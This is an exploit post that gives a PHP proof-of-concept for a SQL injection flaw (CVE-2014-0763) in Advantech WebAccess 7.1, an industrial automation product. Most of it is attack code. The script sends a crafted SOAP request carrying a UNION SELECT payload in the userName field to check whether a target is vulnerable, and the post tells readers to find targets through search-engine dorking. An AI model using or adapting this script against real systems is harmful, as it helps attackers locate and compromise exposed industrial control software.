Advantech WebAccess 7.1 SQL Injection

=============================================================================================================================================
    | # Title     : Advantech WebAccess 7.1 SQL Injection Vulnerability                                                                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www2.advantech.com/ia/newsletter/AutomationLink/June2013/EN/product01.html                                          |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: This code is an exploit written in PHP, which aims to scan and exploit the SQL Injection vulnerability in Advantech WebAccess 7.1. 
    
        This attack is executed through the ChartThemeConfig service located in DBVisitor.dll.
    
       (Related : https://packetstorm.news/files/id/180782/ Linked CVE numbers: CVE-2014-0763 ) .
    	
    [+] save code as poc.php.
    
    [+] Set target : line 25
    
    [+] PayLoad :
    
    <?php
    
    class AdvantechSQLiExploit {
        private $targetUri;
        private $webDatabase;
    
        public function __construct($targetUri = '/BEMS', $webDatabase = "C:\\WebAccess\\Node\\config\\bwCfg.mdb") {
            $this->targetUri = $targetUri;
            $this->webDatabase = $webDatabase;
        }
    
        private function buildSoapRequest($injection) {
            $xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>";
            $xml .= "<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\">";
            $xml .= "<s:Body>";
            $xml .= "<GetThemeNameList xmlns=\"http://tempuri.org/\">";
            $xml .= "<userName>{$injection}</userName>";
            $xml .= "</GetThemeNameList>";
            $xml .= "</s:Body>";
            $xml .= "</s:Envelope>";
            return $xml;
        }
    
        private function sendRequest($xml) {
            $url = "http://target" . $this->targetUri . "/Services/ChartThemeConfig.svc";
            $headers = [
                "Content-Type: text/xml; charset=UTF-8",
                "SOAPAction: \"http://tempuri.org/IChartThemeConfig/GetThemeNameList\""
            ];
    
            $ch = curl_init($url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $xml);
            $response = curl_exec($ch);
            curl_close($ch);
    
            return $response;
        }
    
        public function exploit() {
            $marker = bin2hex(random_bytes(5));
            $injection = "' UNION ALL SELECT '{$marker}' FROM BAThemeSetting WHERE '1'='1";
            $xml = $this->buildSoapRequest($injection);
            $response = $this->sendRequest($xml);
    
            if (strpos($response, $marker) !== false) {
                echo "Target is vulnerable!\n";
            } else {
                echo "Target is NOT vulnerable.\n";
            }
        }
    }
    
    $exploit = new AdvantechSQLiExploit();
    $exploit->exploit();
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================